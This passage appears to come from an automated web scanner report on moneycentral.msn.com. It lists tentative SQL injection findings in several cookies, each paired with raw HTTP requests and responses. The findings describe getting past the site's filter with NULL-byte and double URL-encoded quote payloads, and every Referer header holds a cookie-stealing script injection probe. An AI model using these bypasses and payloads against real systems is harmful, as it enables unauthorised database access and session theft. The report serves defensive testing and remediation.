The s_sq cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_sq cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /inc/Views/Shared/Core/Content/js/hotmaildata/getmaildata.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D%00'

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 19:56:28 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /inc/Views/Shared/Core/Content/js/hotmaildata/getmaildata.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D%00''

Response 2

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 04 Jan 2011 02:40:30 GMT
Accept-Ranges: bytes
ETag: "0635fc0b8abcb1:1427c"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 19:56:27 GMT
Content-Length: 1576


(function($)
{var defaults={proxyurl:'http://hotmailproxy.redacted/pm/v1.0/getheaders.aspx',canaryCookie:'WLMMAC',signedIn:$.signedIn,listlen:3,retries:2,domain:'http://mail.live.com/'};var subscrib
...[SNIP]...

1.30. http://redacted/inc/Views/Shared/Core/Content/js/hotmaildata/unreadcount.js [CC cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /inc/Views/Shared/Core/Content/js/hotmaildata/unreadcount.js

Issue detail

The CC cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the CC cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the CC cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /inc/Views/Shared/Core/Content/js/hotmaildata/unreadcount.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US%2527; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 19:56:23 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /inc/Views/Shared/Core/Content/js/hotmaildata/unreadcount.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US%2527%2527; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 04 Jan 2011 02:40:31 GMT
Accept-Ranges: bytes
ETag: "80f9f7c0b8abcb1:161bf"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 19:56:23 GMT
Content-Length: 495


(function($)
{var defaults={hmtemplate:'{0} ({1})',maxcount:9999};$.fn.unreadCount=function(options)
{var settings=$.extend(true,{},defaults,options);return this.each(function()
{var $hotmail=$(t
...[SNIP]...

1.31. http://redacted/inc/Views/Shared/Core/Content/js/utilities/cookies.js [MC1 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /inc/Views/Shared/Core/Content/js/utilities/cookies.js

Issue detail

The MC1 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the MC1 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the MC1 cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /inc/Views/Shared/Core/Content/js/utilities/cookies.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32%2527; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 15:09:24 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /inc/Views/Shared/Core/Content/js/utilities/cookies.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32%2527%2527; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 04 Jan 2011 02:40:32 GMT
Accept-Ranges: bytes
ETag: "09090c1b8abcb1:1a400"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Server: TK2MCWBA01
Date: Sun, 30 Jan 2011 15:09:24 GMT
Content-Length: 568


(function()
{String.prototype.setCookie=function(value,expiryDays,domain,path,secure)
{var builder=[this,"=",value];if(expiryDays)
{var date=new Date();date.setTime(date.getTime()+(expiryDays*864
...[SNIP]...

1.32. http://redacted/inc/Views/Shared/Core/Content/js/utilities/cookies.js [MUID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /inc/Views/Shared/Core/Content/js/utilities/cookies.js

Issue detail

The MUID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the MUID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the MUID cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /inc/Views/Shared/Core/Content/js/utilities/cookies.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F%2527; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 19:55:15 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /inc/Views/Shared/Core/Content/js/utilities/cookies.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F%2527%2527; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 04 Jan 2011 02:40:32 GMT
Accept-Ranges: bytes
ETag: "09090c1b8abcb1:1a400"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Server: TK2MCWBA01
Date: Sun, 30 Jan 2011 19:55:15 GMT
Content-Length: 568


(function()
{String.prototype.setCookie=function(value,expiryDays,domain,path,secure)
{var builder=[this,"=",value];if(expiryDays)
{var date=new Date();date.setTime(date.getTime()+(expiryDays*864
...[SNIP]...

1.33. http://redacted/inc/Views/Shared/Core/Content/js/utilities/getcookie.js [CULTURE cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /inc/Views/Shared/Core/Content/js/utilities/getcookie.js

Issue detail

The CULTURE cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the CULTURE cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the CULTURE cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /inc/Views/Shared/Core/Content/js/utilities/getcookie.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US%2527; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 15:09:24 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /inc/Views/Shared/Core/Content/js/utilities/getcookie.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US%2527%2527; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 04 Jan 2011 02:40:33 GMT
Accept-Ranges: bytes
ETag: "802629c2b8abcb1:16c4d"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 15:09:24 GMT
Content-Length: 193


(function()
{String.prototype.getCookie=function()
{var re=new RegExp('\\b'+this+'\\s*=\\s*([^;]*)','i');var match=re.exec(document.cookie);return(match&&match.length>1?match[1]:'');};})();

1.34. http://redacted/inc/Views/Shared/Core/Content/js/utilities/getcookie.js [v1st cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /inc/Views/Shared/Core/Content/js/utilities/getcookie.js

Issue detail

The v1st cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the v1st cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the v1st cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /inc/Views/Shared/Core/Content/js/utilities/getcookie.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4%2527; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 19:55:11 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /inc/Views/Shared/Core/Content/js/utilities/getcookie.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4%2527%2527; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 04 Jan 2011 02:40:33 GMT
Accept-Ranges: bytes
ETag: "802629c2b8abcb1:153c9"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 19:55:11 GMT
Content-Length: 193


(function()
{String.prototype.getCookie=function()
{var re=new RegExp('\\b'+this+'\\s*=\\s*([^;]*)','i');var match=re.exec(document.cookie);return(match&&match.length>1?match[1]:'');};})();

1.35. http://redacted/inc/Views/Shared/Core/Content/js/utilities/stringutils.js [v1st cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /inc/Views/Shared/Core/Content/js/utilities/stringutils.js

Issue detail

The v1st cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the v1st cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the v1st cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /inc/Views/Shared/Core/Content/js/utilities/stringutils.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4%2527; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 19:55:23 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /inc/Views/Shared/Core/Content/js/utilities/stringutils.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4%2527%2527; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 04 Jan 2011 02:40:33 GMT
Accept-Ranges: bytes
ETag: "802629c2b8abcb1:16c4d"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 19:55:23 GMT
Content-Length: 576


(function()
{String.prototype.format=function()
{for(var fmt=this,ndx=0;ndx<arguments.length;++ndx)
{fmt=fmt.replace(new RegExp('\\{'+ndx+'\\}',"g"),arguments[ndx]);}
return fmt;};String.prototy
...[SNIP]...

1.36. http://redacted/inc/Views/Shared/Core/Content/js/utility.js [SRCHHPGUSR cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /inc/Views/Shared/Core/Content/js/utility.js

Issue detail

The SRCHHPGUSR cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the SRCHHPGUSR cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the SRCHHPGUSR cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /inc/Views/Shared/Core/Content/js/utility.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1%2527; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 15:09:50 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /inc/Views/Shared/Core/Content/js/utility.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1%2527%2527; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Content-Type: application/x-javascript
